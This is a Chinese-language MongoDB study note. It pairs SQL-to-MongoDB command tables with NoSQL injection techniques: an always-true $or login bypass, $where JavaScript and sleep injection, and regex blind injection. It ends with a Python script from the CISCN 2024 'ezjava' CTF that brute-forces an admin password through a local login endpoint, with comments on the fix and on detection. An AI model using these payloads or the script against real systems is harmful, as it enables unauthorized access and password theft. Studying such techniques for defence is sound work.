MongoDB基础
SQL 概念 | MongoDB 概念 | 说明 |
---|---|---|
database | database | 数据库 |
table | collection | 数据库表/集合 |
row | document | 数据记录行/文档 |
column | field | 数据字段/域 |
index | index | 索引 |
primary key | primary key | 主键,MongoDB 自动将 _id 字段设置为主键 |
mysql | MongoDB | 说明 |
---|---|---|
create database DATABASE_NAME | use DATABASE_NAME | 数据库不存在,则自动创建数据库 |
use DATABASE_NAME | use DATABASE_NAME | |
database() | db | |
show databases | show dbs | 没有数据的数据库无法显示出来 |
drop database DATABASE_NAME | db.dropDatabase() | |
create table test | db.createCollection("myNewCollection") | |
show tables | show collections/show tables | |
insert into table_name values('','') | db.mycol2.insert({"name" : "菜鸟教程"}) | 没有这个集合会自动创建 |
drop table table_name | db.mycol2.drop() | |
select * from table_name | db.users.find() | |
select * from table_name where age>25 | db.myCollection.find({ age: { $gt: 25 } }) | $gt(>)、$lt(<)、$gte(>=)、$lte(<=)、$eq(=)、$ne(!=) |
select * from table_name where a>1 and b <1 | db.myCollection.find({$and: [{ age: { $gt: 25 } },{ city: "New York" }]}); | $and、$or、$not、$nor |
where likes>50 AND (by = '菜鸟教程' OR title = 'MongoDB 教程') | db.col.find({"likes": {$gt:50}, $or: [{"by": "菜鸟教程"},{"title": "MongoDB 教程"}]}) |
联合注入
例:String stringQuery = "{ 'username' : '" + name + "', 'password' : '" + password + "'}";
name=1&password=1 ==> {'username':'1','password':'1'}
username=admin', $or: [ {}, {'a': 'a&password=' }], $comment: '123456 ==> { 'username': 'admin', $or: [ {}, {'a':'a', password: '' }], $comment: '123456'}：$or 中的空对象 {} 匹配任意文档，$comment 用来吸收模板末尾多出的引号，因此条件恒为真
JavaScript 注入
$where 可以执行 JS 代码，例如查找 username 等于 whoami 的数据：db.users.find({ $where: "function(){return(this.username == 'whoami')}" })
让服务器sleep
db.users.find({ $where: "function(){sleep(5000);return(this.username == 'a')}" })
布尔盲注
db.users.find({'username':'admin', 'password':{$regex:'.{32}'}})：password 匹配 32 个任意字符（. 不匹配换行符 \n），有回显；匹配 31 个也有回显
db.users.find({'username':'admin', 'password':{$regex:'.{33}'}})：password 匹配 33 个字符时不回显
所以 password 长度为 32。
CISCN 2024华中赛区ezjava
import requests
# CISCN 2024 (Central China regional) "ezjava": regex-based boolean blind
# extraction against a login endpoint whose MongoDB query is built by string
# concatenation (see the Java example above -- the "password" value is spliced
# straight into the query text). Kept as the worked example of why
# concatenated queries are exploitable. Server-side fix: pass user input as
# typed values, never as query text, and reject keys starting with "$".
# Detection: many POSTs to the login endpoint carrying "$regex" in the body,
# one per candidate character.
url = "http://127.0.0.1:9999/login"   # local challenge instance
mylist = "abcdefghijklmnopqrstuvwxyz0123456789"  # candidate alphabet tried one char at a time
password = ""   # recovered prefix so far
proxies = {}    # empty = direct connection; can point requests at a proxy for traffic review
for i in range(32):   # 32 = length established by the .{32} / .{33} probes above
    for j in mylist:
        # The submitted "password" closes the string literal, injects a
        # {$regex: '^<prefix><j>.*'} anchored on the known prefix, and then
        # re-supplies 'username':'admin' so the tail of the template still
        # parses (the comment line below shows the resulting text).
        data = {
            "username":"admin","password":"','password':{'$regex':'^"+password+j+".*'},'username':'admin"
        }
        #','password':{'$regex':'^x.*'},'username':'admin
        r = requests.post(url,data=data,proxies=proxies)
        # Oracle: the failure message is absent only when the regex matched,
        # i.e. when j is the next character of the password.
        if r.text.find("username or password incorrect")==-1:
            password+=j
            print(password)